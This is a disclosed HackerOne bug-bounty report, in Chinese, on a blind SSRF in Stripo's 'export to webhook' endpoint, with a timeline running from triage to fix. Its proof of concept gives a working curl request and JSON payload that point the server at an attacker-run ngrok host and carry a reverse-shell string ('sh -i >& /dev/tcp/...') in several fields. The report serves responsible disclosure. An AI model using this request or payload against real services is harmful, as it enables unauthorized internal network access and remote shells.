Stripo Inc | 报告 #2932960 - [my.stripo.email] 在Stripo应用导出功能中通过缺失端点"导出邮件消息至Zapier"存在的盲SSRF漏洞 | HackerOne
时间线
- ID-verified:已成功完成身份验证检查的黑客。
- odaysec 向 Stripo Inc 提交了一份报告。
- 2025年1月13日,UTC时间上午12:09
报告内容
漏洞概述
本演示涵盖在Stripo导出服务中发现的一个关键盲SSRF(服务器端请求伪造)漏洞。SSRF漏洞允许攻击者操纵服务器向内部或外部系统发起任意请求,可能导致严重的安全漏洞。该漏洞存在于端点 /exportservice/v3/exports/WEBHOOK/accounts 中。通过在 webhookUrl 参数中提供恶意输入,攻击者可触发SSRF,导致服务器向攻击者控制的系统发起未经授权的HTTP请求。
漏洞利用详情
概念验证 (PoC)
以下curl命令演示了该漏洞的利用过程:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
|
curl -i -X POST 'https://my.stripo.email/bapi/exportservice/v3/exports/WEBHOOK/accounts/52027412' \
--data '{
"id": 52027412,
"name": "sh -i & devtcp192.168.100.3 0&1",
"oAuthRequired": false,
"authLink": null,
"draft": false,
"destination": "WEBHOOK",
"properties": {
"headers": [
{
"name": "sh -i >& /dev/tcp/192.168.100.3/9001 0>&1",
"value": "sh -i >& /dev/tcp/192.168.100.3/9001 0>&1"
}
],
"accountName": "sh -i & devtcpbe7e-101-255-157-9.ngrok-free.app9001 0&1",
"webhookUrl": "https://cd7c-101-255-157-9.ngrok-free.app/sh -i & devtcpbe7e-101-255-157-9.ngrok-free.app9001 0&1",
"webhookType": "CUSTOM"
},
"public": false
}'
|
生成的HTTP请求
处理时,应用程序会向指定的 webhookUrl 生成以下HTTP请求:
1
2
3
4
5
6
7
8
9
10
|
POST /webhook/sh%20-i%20%3E%26%20%2Fdev%2Ftcp%2F192.168.100.3%2F9001%200%3E%261/ HTTP/1.1
Host: 5290-101-255-157-9.ngrok-free.app
User-Agent: Apache-HttpClient/4.5.14 (Java/21.0.5)
Content-Length: 104
Accept: application/json
Accept-Encoding: gzip,deflate
Traceparent: 00-58ae5f178436f516dfed5bcabe66e0a4-6f1c4d73cae918b9-00
X-Forwarded-For: 54.247.167.106
X-Forwarded-Host: 5290-101-255-157-9.ngrok-free.app
X-Forwarded-Proto: https
|
通过Burp Suite发起的HTTP请求
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
|
POST /bapi/exportservice/v3/exports/WEBHOOK/accounts/52027412 HTTP/1.1
Host: my.stripo.email
Content-Type: application/json
Content-Length: 457
{
"id": 52027412,
"name": "sh -i & devtcp192.168.100.3 0&1",
"oAuthRequired": false,
"authLink": null,
"draft": false,
"destination": "WEBHOOK",
"properties": {
"headers": [
{
"name": "sh -i >& /dev/tcp/192.168.100.3/9001 0>&1",
"value": "sh -i >& /dev/tcp/192.168.100.3/9001 0>&1"
}
],
"accountName": "sh -i & devtcpbe7e-101-255-157-9.ngrok-free.app9001 0&1",
"webhookUrl": "https://cd7c-101-255-157-9.ngrok-free.app/sh -i & devtcpbe7e-101-255-157-9.ngrok-free.app9001 0&1",
"webhookType": "CUSTOM"
},
"public": false
}
|
载荷:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
|
{
"id": 52027412,
"name": "sh -i & devtcp192.168.100.3 0&1",
"oAuthRequired": false,
"authLink": null,
"draft": false,
"destination": "WEBHOOK",
"properties": {
"headers": [
{
"name": "sh -i >& /dev/tcp/192.168.100.3/9001 0>&1",
"value": "sh -i >& /dev/tcp/192.168.100.3/9001 0>&1"
}
],
"accountName": "sh -i & devtcpbe7e-101-255-157-9.ngrok-free.app9001 0&1",
"webhookUrl": "https://cd7c-101-255-157-9.ngrok-free.app/sh -i & devtcpbe7e-101-255-157-9.ngrok-free.app9001 0&1",
"webhookType": "CUSTOM"
},
"public": false
}
|
附件:StripoPOC.mkv (F3939737)
影响
- 数据泄露:攻击者可利用SSRF访问敏感的内部网络数据,如云元数据、内部API端点或其他受限服务。
- 端口扫描
- 内部资源访问:盲SSRF允许访问内部服务或端点,绕过网络限制。
- 链式攻击:可能导致更高级的利用,例如获取敏感元数据或执行远程命令。
附件
1 个附件:F3939737: StripoPOC.mkv
后续进展
- nikandrov_nikolai (Stripo Inc 员工) 将状态更改为 Triaged。 2025年1月21日,UTC时间上午10:56
你好 @offensiveops,非常感谢这份报告和你的贡献。我已经创建了任务,团队将尽快解决此问题。祝好,Stripo 开发团队。
- ID-verified:已成功完成身份验证检查的黑客。
- odaysec 发布了一条评论。 2025年4月23日,UTC时间上午7:10
你好!早上好 @nikandrov_nikolai。我今天审查了端点 /bapi/exportservice/v3/exports/webhook/accounts/{uid} 上的漏洞步骤,发现该问题已被修复。我们能否将此报告标记为已解决?祝好,Zeroday Sec 团队。
- nikandrov_nikolai (Stripo Inc 员工) 关闭了报告并将状态更改为 Resolved。 2025年4月23日,UTC时间上午9:36
- odaysec 请求披露此报告。 2025年4月23日,UTC时间上午10:05
- nikandrov_nikolai (Stripo Inc 员工) 同意披露此报告。 3小时前
- 此报告已披露。 3小时前
报告信息
- 报告日期:2025年1月13日,UTC时间上午12:09
- 报告者:odaysec
- 报告对象:Stripo Inc
- 参与者:
- 报告ID:#2932960
- 状态:Resolved
- 严重程度:Critical (9 ~ 10)
- 披露日期:2025年12月1日,UTC时间上午8:22
- 弱点:Server-Side Request Forgery (SSRF)
- CVE ID:None
- 赏金:Hidden
- 账户详情:None